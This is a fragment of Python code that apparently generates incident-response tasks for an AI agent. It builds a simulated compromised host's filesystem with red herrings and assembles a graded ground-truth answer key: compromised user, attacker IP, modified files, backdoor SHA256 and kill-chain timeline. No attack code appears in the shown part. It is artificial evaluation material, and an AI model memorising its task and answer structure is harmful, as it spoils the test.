        f"/home/{main_user}/.bash_history": result["bash_history"],
        "/etc/passwd": _passwd_file(main_user, rng),
        "/etc/hostname": f"{host}\n",
        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
    }
    # add pattern-specific modified files
    for path, content in result["modified_files"].items():
        filesystem[path] = content

    # 7. red herrings
    if difficulty >= 4:
        intensity = 1 if difficulty == 4 else 2
        herrings = _red_herrings(rng, host, ts_base, intensity)
        for path, content in herrings.items():
            if path in filesystem:
                continue  # never overwrite a real artifact
            filesystem[path] = content

    # 8. sanity check: every ground-truth path must actually exist in the
    #    filesystem the agent will explore
    for p in modified_paths:
        assert p in filesystem, f"ground-truth path not in filesystem: {p}"

    # 9. assemble ground truth by difficulty tier
    gt: Dict = {
        "compromised_user": main_user,
        "initial_ip": attacker_ip,
    }
    if difficulty >= 2:
        gt["modified_files"] = modified_paths
        gt["backdoor_sha256"] = bd_sha
    if difficulty >= 4:
        gt["timeline"] = list(result["timeline"])

    task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"

    description = _describe(difficulty, pattern, main_user, host)

    return {
        "task_id": task_id,
        "difficulty": _difficulty_label(difficulty),
        "description": description,
        "filesystem": filesystem,
        "ground_truth": gt,
    }
283
+
284
+
285
+ # ---------------------------------------------------------------------------
286
+ # Small helpers
287
+ # ---------------------------------------------------------------------------
288
+
289
def _difficulty_label(d: int) -> str:
    """Map a numeric difficulty tier to its label; anything unrecognised is "medium"."""
    if d == 1:
        return "easy"
    if d in (4, 5):
        return "hard"
    return "medium"
291
+
292
+
293
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
    """
    Compose the task description shown to the agent.

    The text is a fixed introduction naming `host`, a difficulty-dependent list
    of fields to report (tier 1, tiers 2-3, or everything else), and a trailing
    "(Pattern: ...)" tag. The `user` argument is accepted but not used.
    """
    intro = (
        f"Host '{host}' was compromised. Investigate the filesystem to determine "
        "what happened. Start by reading /var/log/auth.log and the shell histories "
        "under /home."
    )
    if difficulty == 1:
        ask = "Report: compromised_user and initial_ip only."
    elif difficulty in (2, 3):
        ask = (
            "Report: compromised_user, initial_ip, modified_files "
            "(absolute paths), and the SHA256 of the attacker-dropped backdoor."
        )
    else:
        ask = (
            "Report: compromised_user, initial_ip, modified_files, "
            "backdoor_sha256, AND an ordered kill-chain timeline with phases "
            "login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
            "present."
        )
    return f"{intro} {ask} (Pattern: {pattern})"